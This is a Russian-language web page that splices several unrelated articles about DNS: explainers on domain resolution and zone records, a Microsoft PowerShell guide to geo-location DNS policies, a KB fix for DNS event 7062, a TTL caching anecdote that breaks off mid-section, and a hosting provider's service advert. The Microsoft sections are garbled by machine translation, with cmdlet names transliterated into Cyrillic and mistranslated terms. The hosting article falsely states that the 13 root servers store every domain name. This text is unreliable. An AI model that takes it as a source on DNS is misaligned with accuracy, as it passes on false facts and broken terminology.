Dns адрес: Что такое DNS-сервер — объясняем простыми словами

Содержание

Что такое DNS? – Знакомство с DNS – AWS

DNS (система доменных имен) преобразует доменные имена, удобные для человеческого восприятия (например, www.amazon.com), в IP-адреса, понимаемые машиной (например, 192.0.2.44).

 

 

Все компьютеры, подключенные к Интернету, включая смартфоны, настольные компьютеры и серверы, предоставляющие контент для огромных торговых веб-сайтов, находят друг друга и обмениваются информацией с помощью цифр. Эти цифры называются IP-адресами. Чтобы открыть веб-сайт в браузере, не требуется запоминать длинные наборы цифр. Достаточно ввести доменное имя, например example.com, и браузер откроет нужную страницу.

Служба DNS, например Amazon Route 53, – это глобальный распределенный сервис, преобразующий доменные имена, удобные для человеческого восприятия (например, www.example.com), в числовые IP-адреса (например, 192.0.2.1), используемые для взаимодействия компьютеров. Система DNS в Интернете очень похожа на телефонную книгу, которая устанавливает привязку имен абонентов к их телефонным номерам. Серверы DNS преобразуют запросы по именам в IP-адреса, обеспечивая соединение конечного пользователя с определенным сервером при вводе доменного имени в веб-браузер пользователя. Такие запросы называются

DNS-запросами.

Авторитативный DNS-сервис. Авторитативный DNS-сервис предоставляет механизм обновления, используемый разработчиками для управления публичными именами DNS. Он отвечает на запросы к DNS, преобразуя доменные имена в IP-адреса, чтобы обеспечить взаимодействие компьютеров между собой. Авторитативный DNS-сервис полностью отвечает за домен и предоставляет информацию об IP-адресах в ответ на запросы рекурсивных DNS-серверов. Amazon Route 53 является авторитативным DNS-сервисом.

Рекурсивный DNS-сервис. Обычно клиенты не отправляют запросы напрямую к авторитативным DNS-сервисам. Вместо этого они взаимодействуют с другим DNS-сервисом, который называется преобразователь имен или рекурсивный DNS-сервис. Рекурсивный DNS-сервис похож на управляющего в отеле: сам он не хранит записи DNS, но действует в качестве посредника, который может достать нужную информацию для вас. Если рекурсивный DNS-сервис хранит информацию в кэше или постоянном хранилище в течение определенного времени, тогда он отвечает на DNS-запрос, возвращая информацию об источнике или IP-адрес. Если он не хранит эту информацию, он передает запрос в один или несколько авторитативных DNS-серверов.

Что такое DNS-сервер и для чего он нужен?

480 auto

Если спросить среднего пользователя интернета, что такое сайт, скорее всего, он назовёт, например, yandex.ru, mail.ru, google.com, facebook.com, …

В практическом смысле этого вполне достаточно: нашёл интересный сайт, сообщил знакомым его доменное имя (или проще, «адрес»).

Однако настоящим адресом доменное имя не является. Ну это примерно так же, как отправить письмо с надписью на конверте: «город Екатеринбург, Петру Иванову». Здесь дело даже не в том, что Петров Ивановых в Екатеринбурге может быть несколько (представим, что человек с таким именем там единственный). Проблема в том, что адресат может перемещаться, минимум, по городу, и вручить ему письмо будет крайне проблематично.

Но письма-то доставляют и получают! — Да, конечно. Потому что они отправляют по почтовым адресам. Например, «город Ленинград, 3-я улица Строителей, дом 25, квартира 12».

Почтовым адресом в интернете является IP-адрес, состоящий из четырёх чисел от 0 до 255, например, 74.125.131.100. Это — один из IP-адресов сайта google.com. Если в адресной строке вашего браузера ввести эти числа, вы окажетесь на портале google.com, точнее, на google.ru, куда вас автоматически перенаправят.

Почему «один из адресов», и какого типа бывают IP-адреса, пока оставим в стороне.

В интернете IP-адрес задаёт, на какой компьютер нужно доставить данные.

Вам что-то напоминает IP-адрес? — Мне он напоминает длинный номер мобильного телефона.

Телефонная книга

К сожалению, запоминать длинные телефонные номера непросто. Мы их вносим в свои записные книжки («контакты», по-мобильнофонному) и добавляем к ним понятные имена, например,

Пётр Иванов, +7-343-123-45-67.

В дальнейшем нам не потребуется помнить сам телефонный номер Петра, достаточно того, что этот номер записан в нашу телефонную книгу. Когда нам будет нужно позвонить Петру, мы найдём его в списке наших контактов даже не взглянув на его номер.

В интернете роль телефонной книги играет система доменных имён (DNS, Domain Name System). В ней хранится связь между относительно легко запоминаемым названием сайта и его трудно запоминаемым числовым адресом.

Правда, есть одно существенное отличие этой «интернет-книги» от телефонной. — Её ведёт не каждый знакомый Петра Иванова в отдельности, а он сам.

В частной телефонной книге можно написать: «Петя», «Пётр», «Петруша», «Петруха», «Петруня», «любимый», …, а в «телефонной интернет-книге» записи ведут сами владельцы сайтов, например:

Название домена Адрес
pyotr-ivanov.ru 123.123.123.123

Если кто-то пожелает посетить сайт Петра Иванова, в адресной строке браузера он наберёт: pyotr-ivanov.ru, а система доменных имён сообщит браузеру (точнее, компьютеру, на котором работает браузер), соответствующий IP-адрес, в нашем примере: 123.123.123.123. Компьютер, который находится по этому адресу, обработает запрос браузера и пришлёт ему данные, для отображения запрошенной страницы веб-сайта.

 

 

Теперь понятно, как используются доменные имена? — Однако ещё не рассказано, где хранятся записи о связях между доменными именами сайтов и IP-адресами компьютеров, на которых эти сайты размещены.

DNS-сервер

Он-то и служит телефонной книгой. Он хранит информацию о том, какому IP-адресу соответствует то или иное доменное имя. В интернете DNS-серверов очень много. У них двойная роль:

  • главная — «телефонная интернет-книга»;
  • дополнительная (но тоже важная) — кэширование записей других DNS-серверов.

Сначала несколько слов о кэшировании. Выяснять связь между названием сайта и его IP-адресом требуется при каждом обращении к этому веб-сайту. Если сайт, который вы хотите посетить, находится достаточно далеко, многочисленные запросы к далёкому первичному DNS-серверу могут отнять много времени и замедлить загрузку веб-страниц. Чтобы избежать задержек, ближайший к вашему компьютеру DNS-сервер (обычно находящийся у вашего интернет-провайдера), сохраняет сведения о ранее запрошенных IP-адресах, и при повторном обращении к тому же сайту он сообщит его адрес очень быстро, так как будет хранить его в своём кэше.

Но чтобы что-то кэшировать, нужно иметь источник кэшируемого. Таким источником служат первичные DNS-сервера, хранящие изначальные связи между доменами и их IP-адресами.

Для регистрации доменного имени достаточно его придумать. Но для того, чтобы оно начало «работать», вы должны сообщить регистратору доменное имя DNS-сервера, который будет хранить подробные данные о регистрируемом вами домене. Об этих данных будет сказано чуть позже.

Обычно используют два DNS-сервера: первичный и вторичный. Но их может быть и больше. Большее число DNS-серверов повышает надёжность доступа к вашему домену: если один окажется недоступен, ответит другой.

В реальном мире двух — вполне достаточно.

 

 

Многие регистраторы доменных имён и просто интернет-провайдеры предлагают использовать свои DNS-серверы в режиме платной услуги.

Хорошая новость: в облаке 1cloud услугу DNS-хостинга можно получить бесплатно! Достаточно быть клиентом этого публичного облака.

DNS-зона

Для дальнейшего понимания системы доменных имён нужно узнать, что такое DNS-зона.

Дело в том, что мы рассмотрели только один из вариантов связи между доменным именем и IP-адресом: один домен – один сайт – один адрес. Однако с конкретным доменным именем может быть связан не только веб-сайт, но и, например, почтовый сервер. И у них могут быть разные адреса.

 

 

Одному и тому же домену может соответствовать веб-сайт или почтовый сервер с несколькими IP-адресами, каждый. Их используют для повышения надёжности и производительности сайта или почтовой системы.

А ещё нужно вспомнить о возможных поддоменах, например,

mail.company.ru, ftp.company.ru, sklad.company.ru, …

Все необходимые связи между доменным именем и IP-адресами отражаются в специальном файле, расположенном на DNS-сервере. Содержимое этого файла называется описанием DNS-зоны, или просто DNS-зоной.

В ней могут присутствовать записи разных типов.

Тип записи Пояснение
A Адрес «сайта» соответствующего доменного имени
MX Адрес почтового сервера в соответствующем домене
CNAME Синоним описываемого домена.
Например, здесь можно указать, что доменное имя www.company.ru является синонимом доменного имени company.ru, и запросы по этому синониму будут перенаправляться на адрес основного доменного имени
NS Здесь указывается доменные имена DNS-серверов, обслуживающих описываемый домен.
Например, ns1.1cloud.ru и ns2.1cloud.ru
TXT Любое текстовое примечание

Это — не полный перечень возможных типов полей. Он был сокращён для упрощения ознакомительного изложения.

Дополнение

Как в любом деле, в правильном описании доменного имени есть свои детали и нюансы. В этой статье они опущены, чтобы не усложнять начальное знакомство с темой. Однако для общего кругозора уже сейчас следует добавить несколько важных фактов.

  • Выше была описана адресация по стандарту IPv4. Адрес в нём состоит из четырёх чисел. Такая адресация имеет ограничение числа обслуживаемых компьютеров: 4 294 967 296. Это много, но при нынешнем числе устройств, подключенных к интернету адресов стало не хватать.
    Для преодоления этого объективного лимита ввели новый стандарт: IPv6, по которому длина адреса увеличилась, и стало возможным адресовать намного, намного больше компьютеров. В DNS-зоне тип записи для такого адреса обозначается: AAAA.
  • Одному домену могут соответствовать несколько IP-адресов.
    Обычно такое назначение делается для повышения надёжности или быстродействия. Порядок выдачи IP-адреса из списка на запрос по доменному имени зависит от настроек DNS-сервера. Чаще всего адрес выдаётся в случайном порядке.
  • Одному IP-адресу может соответствовать несколько доменов.
    Строго говоря, это противоречит логике системы доменных имён, которая предполагает однозначную связь IP-адреса с соответствующим доменом. Однако, как было сказано ранее, 4-числовой IP-адрес стал дефицитным ресурсом, который уже достаточно давно стараются экономить.
    На практике такая экономия может выглядеть следующим образом. На компьютере размещают несколько не очень больших веб-сайтов с разными доменными именами, которым присвоен одинаковый IP-адрес. Веб-сервер, работающий на этом компьютере и обслуживающий эти сайты, получив запрос, анализирует домен, в который он пришёл, и направляет его на правильный сайт.
    Такая практика не позволяет обеспечить однозначность обратной связи IP-адреса с доменным именем, ведь в этом случае их несколько. Но позволяет экономить IP-адреса.
     

Заключение

Изложенный порядок на первый взгляд может показаться сложным. Однако он позволяет:

  • пользоваться доменными именами, которые запоминаются легче, чем числовые адреса;
  • повышать надёжность доступа к интернет-ресурсам путём использования для них нескольких компьютеров, разнесённых по сети;
  • увеличивать производительность интернет-ресурсов за счёт распределения нагрузки внутри группы обеспечивающих компьютеров;
  • перемещать прикладные компьютеры по интернету, не меняя их доменного адреса.

С учётом изложенного в этой статье, определим DNS кратко так.

DNS (Domain Name System) — это система доменных имён, которая связывает названия доменов с IP-адресами компьютеров, соответствующих этим доменам. Эта система включает в себя как регламентирующие документы, так множество DNS-серверов, работающих в интернете и сообщающих IP-адреса в ответ на запрос по доменным именам.

 

P.S. Еще немного материалов по теме DNS:

Управление трафиком на основе географического расположения на основных серверах с помощью политики DNS

  • Чтение занимает 3 мин

В этой статье

применимо к: Windows server 2022, Windows server 2019 Windows Server 2016

С помощью этого раздела вы узнаете, как настроить политику DNS, чтобы разрешить основным DNS-серверам отвечать на запросы клиентов DNS, основываясь на географическом расположении клиента и ресурса, к которому пытается подключиться клиент, предоставляя клиенту IP-адрес ближайшего ресурса.

Важно!

В этом сценарии показано, как развернуть политику DNS для управления трафиком на основе географического расположения при использовании только основных DNS-серверов. Можно также выполнять управление трафиком на основе географического расположения при наличии основного и дополнительного DNS-серверов. При наличии первичного и вторичного развертывания сначала выполните действия, описанные в этом разделе, а затем выполните действия, описанные в разделе Использование политики DNS для управления трафиком на основе Geo-Location с помощью Primary-Secondary развертываний.

С помощью новых политик DNS можно создать политику DNS, которая позволяет DNS-серверу отвечать на запросы клиентов, запрашивающие IP-адрес сервера. Экземпляры веб-сервера могут находиться в разных центрах обработки данных в разных физических расположениях. DNS может оценить расположение клиента и веб-сервера, а затем ответить на запрос клиента, предоставив клиенту IP-адрес веб-сервера, который физически расположен ближе к клиенту.

Для управления ответами DNS-сервера на запросы от DNS-клиентов можно использовать следующие параметры политики DNS.

  • Подсеть клиента. Имя предопределенной клиентской подсети. Используется для проверки подсети, из которой был отправлен запрос.
  • Транспортный протокол. Транспортный протокол, используемый в запросе. Возможные значения: UDP и TCP.
  • Протокол Интернета. Сетевой протокол, используемый в запросе. Возможные значения: IPv4 и IPv6.
  • IP-адрес интерфейса сервера. IP-адрес сетевого интерфейса DNS-сервера, получившего запрос DNS.
  • Полное доменное имя. Полное доменное имя (FQDN) записи в запросе с возможностью использования подстановочной карты.
  • Тип запроса. Тип запрашиваемой записи (A, SRV, TXT и т. д.).
  • Время суток. Время суток, когда получен запрос.

Для формулировки выражений политики можно сочетать следующие критерии с логическим оператором (и/или). При совпадении этих выражений ожидается, что политики выполняют одно из следующих действий.

  • Пропуск. DNS-сервер автоматически удаляет запрос.
  • Запретить. DNS-сервер отвечает на запрос с ответом на сбой.
  • Разрешить. DNS-сервер реагирует на ответ с управляемым трафиком.

Пример управления трафиком на основе географического расположения

Ниже приведен пример того, как можно использовать политику DNS для обеспечения перенаправления трафика на основе физического расположения клиента, выполняющего запрос DNS.

В этом примере используются две вымышленные компании — облачные службы Contoso, которые предоставляют решения для веб-приложений и размещения в домене. и службы Woodgrove Food, которые предоставляют услуги по доставке пищи в нескольких городах по всему миру и имеют веб-сайт с именем woodgrove.com.

Облачные службы Contoso имеют два центра обработки данных — один в США, а другой — в Европе. В Европейском центре обработки данных размещен Портал заказов на продукты для woodgrove.com.

Чтобы клиенты woodgrove.com могли отвечать на запросы с веб-сайта, компания Woodgrove хочет, чтобы европейские клиенты направлялись в центр обработки данных США и американские клиенты, направляемые в центре обработки данных. Клиенты, расположенные в любом месте мира, могут направляться в любой из центров обработки данных.

Этот сценарий показан на следующем рисунке.

Как работает процесс разрешения имен DNS

Во время процесса разрешения имен пользователь пытается подключиться к www.woodgrove.com. В результате получается запрос на разрешение DNS-имени, который отправляется на DNS-сервер, настроенный в свойствах сетевого подключения на компьютере пользователя. Как правило, это DNS-сервер, предоставляемый локальным поставщиком услуг Интернета, который выступает в качестве сопоставителя кэширования, и называется ЛДНС.

Если DNS-имя отсутствует в локальном кэше ЛДНС, сервер ЛДНС перенаправляет запрос на DNS-сервер, который является полномочным для woodgrove.com. Полномочный DNS-сервер отвечает запрошенной записи (www.woodgrove.com) на сервер ЛДНС, который, в свою очередь, кэширует запись локально перед отправкой на компьютер пользователя.

Поскольку облачные службы Contoso используют политики DNS-сервера, полномочный DNS-сервер, на котором размещается contoso.com, настроен для возврата ответов, управляемых трафиком географического расположения. Это приводит к направлению европейских клиентов на Европейский центр обработки данных и направление клиентов в центр обработки данных США, как показано на рисунке.

В этом случае полномочный DNS-сервер обычно видит запрос на разрешение имен, поступающий с сервера ЛДНС, и очень редко с компьютера пользователя. По этой причине исходный IP-адрес в запросе разрешения имен, как видно на полномочном DNS-сервере, является сервером ЛДНС, а не компьютером пользователя. Однако использование IP-адреса сервера ЛДНС при настройке ответов на запросы географического расположения обеспечивает адекватный расчет географического расположения пользователя, так как пользователь выполняет запрос к DNS-серверу своего местного поставщика услуг Интернета.

Примечание

Политики DNS используют IP-адрес отправителя в пакете UDP/TCP, который содержит запрос DNS. Если запрос достигает сервера-источника через несколько прыжков или ЛДНС, политика учитывает только IP последнего сопоставителя, от которого DNS-сервер получает запрос.

Настройка политики DNS для ответов на запросы на основе Geo-Location

Чтобы настроить политику DNS для ответов на запросы на основе географического расположения, необходимо выполнить следующие действия.

  1. Создание подсетей клиента DNS
  2. Создание областей зоны
  3. Добавление записей в области зоны
  4. Создание политик

Примечание

Эти действия необходимо выполнить на DNS-сервере, который является полномочным для зоны, которую требуется настроить. Членство в DnsAdmins(или аналогичное) требуется для выполнения следующих процедур.

В следующих разделах приведены подробные инструкции по настройке.

Важно!

в следующих разделах приведены примеры Windows PowerShell команд, которые содержат примеры значений для многих параметров. Перед выполнением этих команд обязательно замените примеры значений в этих командах значениями, подходящими для вашего развертывания.

Создание подсетей клиента DNS

Первым шагом является указание подсетей или пространства IP-адресов регионов, для которых необходимо перенаправить трафик. Например, если требуется перенаправить трафик для США и Европы, необходимо найти подсети или пространства IP-адресов этих регионов.

Эти сведения можно получить из карт географических IP-адресов. На основе этих дистрибутивов геоip-адресов необходимо создать «подсети клиента DNS». Подсеть клиента DNS — это логическая группа подсетей IPv4 или IPv6, из которой отправляются запросы на DNS-сервер.

для создания подсетей клиента DNS можно использовать следующие команды Windows PowerShell.

Add-DnsServerClientSubnet -Name "USSubnet" -IPv4Subnet "192.0.0.0/24"
Add-DnsServerClientSubnet -Name "EuropeSubnet" -IPv4Subnet "141.1.0.0/24"

Дополнительные сведения см. в разделе Add-днссерверклиентсубнет.

Создание областей зоны

После настройки подсетей клиента необходимо секционировать зону, трафик которой необходимо перенаправить на две разные области зоны, по одной области для каждой настроенной подсети клиента DNS.

Например, если вы хотите перенаправить трафик для DNS-имени www.woodgrove.com, необходимо создать две разные области зоны в зоне woodgrove.com, одну для США и одну для Европы.

Область зоны — это уникальный экземпляр зоны. Зона DNS может иметь несколько областей зоны, при этом каждая область зоны содержит собственный набор записей DNS. Одна и та же запись может присутствовать в нескольких областях с разными IP-адресами или IP-адресами.

Примечание

По умолчанию область зоны существует в зонах DNS. Эта область зоны имеет то же имя, что и зона, а устаревшие операции DNS работают в этой области.

для создания областей зоны можно использовать следующие команды Windows PowerShell.

Add-DnsServerZoneScope -ZoneName "woodgrove.com" -Name "USZoneScope"
Add-DnsServerZoneScope -ZoneName "woodgrove.com" -Name "EuropeZoneScope"

Дополнительные сведения см. в разделе Add-днссерверзонескопе.

Добавление записей в области зоны

Теперь необходимо добавить записи, представляющие узел веб-сервера, в две области зоны.

Например, усзонескопе и еуропезонескопе. В Усзонескопе можно добавить запись www.woodgrove.com с IP-адресом 192.0.0.1, который находится в центре обработки данных США. в Еуропезонескопе можно добавить ту же запись (www.woodgrove.com) с IP-адресом 141.1.0.1 в Европейском центре обработки данных.

для добавления записей в области зоны можно использовать следующие команды Windows PowerShell.

Add-DnsServerResourceRecord -ZoneName "woodgrove.com" -A -Name "www" -IPv4Address "192.0.0.1" -ZoneScope "USZoneScope
Add-DnsServerResourceRecord -ZoneName "woodgrove.com" -A -Name "www" -IPv4Address "141.1.0.1" -ZoneScope "EuropeZoneScope"

в этом примере необходимо также использовать следующие Windows PowerShell команды для добавления записей в область зоны по умолчанию, чтобы обеспечить доступ к веб-серверу woodgrove.com из любого из двух центров обработки данных.

Add-DnsServerResourceRecord -ZoneName "woodgrove.com" -A -Name "www" -IPv4Address "192.0.0.1"
Add-DnsServerResourceRecord -ZoneName "woodgrove.com" -A -Name "www" -IPv4Address "141.1.0.1"

Параметр зонескопе не включается при добавлении записи в область по умолчанию. Это то же самое, что и добавление записей в стандартную зону DNS.

Дополнительные сведения см. в разделе Add-днссерверресаурцерекорд.

Создание политик

После создания подсетей, разделов (областей зоны) и добавления записей необходимо создать политики, соединяющие подсети и секции, чтобы при получении запроса из источника в одной из подсетей DNS-клиента ответ был получен из правильной области действия этой зоны. Для сопоставления области зоны по умолчанию не требуются никакие политики.

чтобы создать политику dns, связывающую подсети клиента DNS и области зоны, можно использовать следующие команды Windows PowerShell.

Add-DnsServerQueryResolutionPolicy -Name "USPolicy" -Action ALLOW -ClientSubnet "eq,USSubnet" -ZoneScope "USZoneScope,1" -ZoneName "woodgrove.com"
Add-DnsServerQueryResolutionPolicy -Name "EuropePolicy" -Action ALLOW -ClientSubnet "eq,EuropeSubnet" -ZoneScope "EuropeZoneScope,1" -ZoneName "woodgrove.com"

Дополнительные сведения см. в разделе Add-днссерверкуериресолутионполици.

Теперь на DNS-сервере настроены необходимые политики DNS для перенаправления трафика на основе географического расположения.

Когда DNS-сервер получает запросы на разрешение имен, DNS-сервер оценивает поля в DNS-запросе на соответствие настроенным политикам DNS. Если исходный IP-адрес в запросе разрешения имен соответствует любой из политик, область связанной зоны используется для ответа на запрос, а пользователь направляется к ресурсу, который является географически ближайшим к ним.

Вы можете создавать тысячи политик DNS в соответствии с требованиями к управлению трафиком, а все новые политики применяются динамически, без перезапуска DNS-сервера во входящих запросах.

Журналы событий DNS-сервера 7062 — Windows Server

  • Чтение занимает 3 мин

В этой статье

В этой статье предоставляется решение для решения события 7062 журнала DNS-сервера.

Применяется к:   Windows Server 2012 R2
Исходный номер КБ:   218814

Симптомы

После применения Пакет обновления 4 DNS-сервер начинает ведение журнала Event 7062:

DNS Server столкнулся с пакетными адресами для себя — IP-адресом w.x.y.z. DNS-сервер никогда не должен отправлять пакет самому себе. Эта ситуация обычно указывает на ошибку конфигурации.

Проверьте следующие области на возможные ошибки конфигурации самостоятельной отправки:

  1. Список переадтрансаторов (DNS-сервер не должен переад.
  2. Мастер-списки вторичных зон.
  3. Оповещать списки основных зон.
  4. Делегирования подзон.

Не должна содержать запись NS для DNS-сервера

Пример: -> этот DNS-сервер dns1.microsoft.com является основным для microsoft.com зоны. -> делегирована зона и не запущена зона bar.microsoft.com bardns.bar.microsoft.com в этом bar.microsoft.com DNS ( dns1.microsoft.com ). Обратите внимание, что эту проверку (с nslookup DNS-менеджера) необходимо проверить как на этом DNS-сервере, так и на сервере(ы), в который делегирована подзона. Вполне возможно, что делегирования было сделано правильно, но что основной DNS для подзоны, имеет какие-либо неправильные записи NS, указывающие обратно на этом сервере. Если эта неправильная запись NS кэшироваться на этом сервере, то самонаправление может привести. Если она найдена, администратор DNS-сервера подзоны должен удалить оскорбить запись NS.

Причина

Эта ошибка вызвана ошибкой конфигурации или является результатом делегирования домена (или поддомена) на сервер, для которого нет файла зоны (хромая делегация).

Решение

Чтобы устранить эту проблему, ознакомьтесь со следующими условиями:

Forwarders

DNS можно настроить для переадтранслировать запросы на назначенные серверы. Убедитесь, что DNS-сервер не настроен для переадтранслировать эти запросы вне сайта на себя:

  1. Выберите сервер, щелкните DNS и нажмите кнопку Свойства из меню.
  2. Щелкните вкладку Forwarders.
  3. Если указан собственный IP-адрес сервера, выберите его и нажмите кнопку Удалить.
  4. После внести это изменение убедитесь в остановке и перезапуске службы DNS.

Список дополнительных зон

Вторичная зона настроена со списком основного или основного сервера(ы). Убедитесь, что собственный IP-адрес сервера не указан в качестве одного из мастеров IP(s):

  1. Выберите вторичную зону, щелкните DNS и нажмите кнопку Свойства из меню.
  2. Перейдите на вкладку Общие.
  3. Если собственный IP-адрес сервера указан в разделе Мастер IP(ы), выберите его и нажмите кнопку Удалить.

Оповещать списки

Microsoft Windows NT DNS Server позволяет администратору указывать (на основном DNS-сервере) все дополнительные DNS-серверы, которые должны быть немедленно уведомлены об изменениях в файле Zone. Убедитесь, что DNS-сервер не настроен для уведомления о себе:

  1. Выберите первичную зону, щелкните DNS и нажмите кнопку Свойства из меню.
  2. Щелкните вкладку Notify.
  3. Если указан собственный IP-адрес сервера, выберите его и нажмите кнопку Удалить.

Хромая делегирования

Делегирование lame определяется как делегирование домена или поддомена серверу, который не является авторитетным для домена (другими словами, файл зоны не существует для домена на сервере). Существует два возможных сценария, которые могут вызвать хромую делегирования:

  • Делегирование домена ребенка самому себе

Если на сервере создается детский домен и в этот домен добавляется запись NS, которая решается на собственный IP-адрес, создается событие 7062. Ниже приведен пример.

  • DNS-сервер ns1.domain.com является основным DNS-сервером domain.com zone для . Создается детский домен с child.domain.com именем и добавляется запись NS child.domain.com для ns1.domain.com . Это приводит к делегированию домена ребенка самому себе. Чтобы устранить эту проблему, удалите запись NS из child.domain.com . Только добавьте записи NS в детские домены, если вы хотите делегировать их на другой сервер (то есть делегировать его ns2.domain.com на).
  • Домен делегирован на сервер без файла зоны

Если другой DNS-сервер делегировал домен (либо домен forward lookup, либо обратный) на сервер и на сервере для этого домена нет файла зоны, создается событие 7062. Ниже представлены примеры.

  • Поставщик услуг Интернета (ISP) поручил вам сеть класса C 192.168.1.0 и делегировал домен 1.168.192.in-addr.arpa для обратного осмотра на сервер DNS. Если на DNS-сервере для этого домена не настроена зона, событие 7062 будет сгенерироваться каждый раз, когда будет выполнен запрос для этого домена с сервера. DNS-сервер будет проходить через иерархию DNS, начиная с корневых серверов, и в конечном итоге получает ответ от DNS-сервера isP, указывающий на то, что сам сервер является авторитетным для домена и пытается запросить сам. Чтобы устранить эту проблему, создайте первичную или вторичную зону для этого домена или измените делегирования.
  • Ваш isP делегировал домен на сервер DNS только для кэширования. Так как на сервере только для кэширования нет файлов зон, любые запросы, которые он делает для хостов, которые находятся в доменах, для которых он делегирован, могут привести к ошибке события 7062. Чтобы устранить эту проблему, создайте основной или вторичный файл зоны для этого домена или измените делегирования.

Дополнительные сведения

В связи с информационным характером этого предупреждения тип серьезности был сокращен с события «Остановка» (красный) до события «Предупреждение» (желтый) в Windows NT 4.0 Пакет обновления 5.

что происходит, когда вы меняете IP-адрес сайта

Похоже, что на этом DNS-сервере запись 1.2.3.4 всё еще кэшируется в течение 144 секунд. Интересно, что если запросить 8.8.8.8 несколько раз, вы получите противоречивые результаты — иногда он выдает новый IP, а иногда старый. Вероятно, 8.8.8.8 на самом деле распределяет нагрузку на кучу разных бэкендов, у каждого из которых собственный кэш.

После пяти минут ожидания все кэши 8.8.8.8 обновились и всегда возвращали новую запись 5.6.7.8. Потрясающе. Это довольно быстро!

Не всегда можно полагаться на TTL

Как и в большинстве интернет-протоколов, не всё подчиняется спецификации DNS. Некоторые DNS-серверы интернет-провайдеров будут кэшировать записи дольше, чем указано в TTL. Например, в течение двух дней вместо пяти минут. И люди всегда могут жестко закодировать старый IP-адрес в своем файле /etc/hosts.

На практике при обновлении записи DNS с пятиминутным TTL можно ожидать, что большой процент клиентов быстро перейдет на новые IP-адреса (например в течение 15 минут), а затем появится куча отставших, которые будут медленно обновляться в течение следующих нескольких дней.

Вариант 2: обновление ваших серверов имен

Итак, мы видели, что когда вы обновляете IP-адрес, не меняя свои серверы имен, многие DNS-серверы довольно быстро получают новый IP-адрес. Отлично. Но что произойдет, если вы измените свои серверы имен? Давайте попробуем!

Я не хотела обновлять серверы имен для своего блога, поэтому вместо этого взяла другой свой домен и использовала его в примерах для журнала по HTTP: это examplecat.com.

Раньше мои серверы были установлены на dns1.p01.nsone.net. Я решила изменить их на серверы Google с адресами ns-cloud-b1.googledomains.com и так далее.

Когда я внесла изменения, мой доменный регистратор несколько зловеще высветил сообщение: «Изменения в examplecat.com сохранены. Они вступят в силу в течение ближайших 48 часов». Затем я установила новую запись A для домена, чтобы она указывала на 1.2.3.4.

Ладно, давайте посмотрим, изменилось ли что-нибудь:

Что такое DNS адрес и как его прописать ?

Скорее всего каждый из вас, кто хоть когда-нибудь имел дело с разработкой сайтов, слышал такое понятие, как DNS. Что же такое DNS, зачем он нужен и как им пользоваться? Об этом и многом другом мы расскажем в нашей статье.

DNS — Domain Name Server/System, компьютерная распределённая система для получения информации о доменах. Чаще всего используется для получения IP-адреса по имени хоста (компьютера или устройства) (с) Википедия.

А теперь простыми словами: каждый раз, когда мы заходим на какой-либо сайт и набираем его название, например www.google.com, за этим сайтом на самом деле скрывается IP-адрес. Попробуйте сами, наберите в адресной строке следующий IP-адрес: 74.125.230.146 и вы попадете на страницу google.

Так для чего же нужен DNS? Все для нас, для людей! Представьте себе, что каждый сайт не имеет привычного нам названия, а все управлялось IP-адресами: “Эй, парень, зайди на сайт 74.125.230.146! Классный сайт, не пожалеешь!” 🙂

DNS — это то, что переводит компьютеру привычные нам интернет сайты в IP адреса (т.е. работает, как самый настоящий переводчик). Только так компьютер может понять, куда именно мы хотим зайти и какую информацию получить.

DNS Root Servers

DNS серверы взаимодействуют друг с другом с помощью сетевых протоколов. Как и в обычной жизни, здесь тоже есть своя иерархия. На верхнем уровне иерархии, так называемые корневые серверы хранят полную базу данных доменных имен в Интернете и соответствующие им IP-адреса.

На данный момент только 13 серверов по всему миру имеют базу данных всех доменных имен, остальные DNS сервера работают на более низком уровне и поддерживают только определенные части общей базы данных.

Когда DNS сервер получает запрос не по своей базе данных (например, географически далеком или редко посещаемом веб-сайте), cервер автоматически переводит эту просьбу на более высокий по уровню в иерархии DNS сервер. Это происходит до тех пор, пока не найдется сервер, который имеет полное соответствие запрошенного сайта в своей базе данных. Ответ, соответственно, возвращается обратно по цепочке DNS серверов прямиком на ваш компьютер.

Как прописать DNS адрес?

Теперь покупая домен, мы знаем, что за ним стоит IP-адрес, а раз есть имя и IP-адрес, то должен быть и DNS сервер.

Имея плохого поставщика DNS сервера, вы рискуете подорвать репутацию своего сайта, поэтому, прежде чем прописывать DNS адреса, убедитесь что сервер качественный.

DNS адреса серверов обычно выглядят так:

ns1.google.com

ns2.google.com

Как вы уже догадались, это принадлежит Google.

Узнать DNS адреса вы можете на сайте хостинга, а прописать их очень легко — через панель управления вашего хостинга.

Как правило, каждый хостинг сайт указывает подробные инструкции по прописанию DNS адресов с помощью панели управления, поэтому обязателньо поищите эту инструкцию на сайте поставщика.

DNS-сервера / Услуги — Ardis

Услугу «DNS-сервер» мы предоставляем бесплатно для всех пользователей арендующих выделенные сервера, но подписаться на эту услугу можно и независимо от аренды серверов. Стоимость услуги составляет от 100 р/год.

Имена серверов имён:
a.p-dns.com
b.p-dns.org
c.p-dns.biz
d.p-dns.info

Как известно, одним из узких мест в надежности сервера являются ДНС-сервера, отвечающие за преобразование доменного имени в IP-адрес сервера. По своей сути это первый сервис, который используется при работе Вашего веб-ресурса. Для наших пользователей мы создали распределенные DNS-сервера с мощными каналами передачи данных, расположенные в Германии, США и Голландии, что обеспечивает высокую скорость ответа и надежность в работе. Для управления ДНС-серверами мы используем DNSmanager 5, компании ISPsystem. Эта панель легко интегрируется с ISPmanager.

Инструкция по использованию

  1. При аренде сервера услуга «DNS-сервер» Вам подключается автоматически, и Вы можете указывать на доменах наши NS-сервера. Письмо с краткой инструкцией и учетными данными придет на почтовый адрес, указанный Вами при регистрации. Для использования Вам нужно прописать домен в ISPmanager (в разделе «Домены»-»Доменные имена»), и после этого указать NS-сервера у доменов. Управлять зоной Вы сможете как из ISPmanager, так и из DNSmanager непосредственно.

После оплаты заказа, Вам на почту придет уведомление с указанием имени пользователя и пароля для DNSmanager, и краткой инструкцией по применению услуги:

Уведомление об услуге DNS-сервер

Настоящим письмом уведомляем, что на Ваше имя был открыт «DNS сервер».
Предлагаем сохранить данное сообщение для удобства использования в дальнейшем.

Адрес веб-интерфейса DNSmanager: https://cp.p-dns.com

Пользователь: XXXXXX_login
Пароль: XXXXXXX
Имена серверов имён:
a.p-dns.com
b.p-dns.org
c.p-dns.biz
d.p-dns.info

Документацию по панели управления DNSmanager доступна как из самой панели,

так на сайте https://docs.ispsystem.ru/dnsmanager/domennye-imena/sozdanie-domennogo-imeni

Желаем успеха в работе с вашим DNS-сервером!
С уважением, команда компании Ardis
https://my.ardis.ru

Поиск DNS — WhatIsMyIP.com®

Используйте инструмент поиска DNS, чтобы найти IP-адрес определенного доменного имени. Результаты будут включать IP-адреса в записи DNS, полученные от серверов имен.

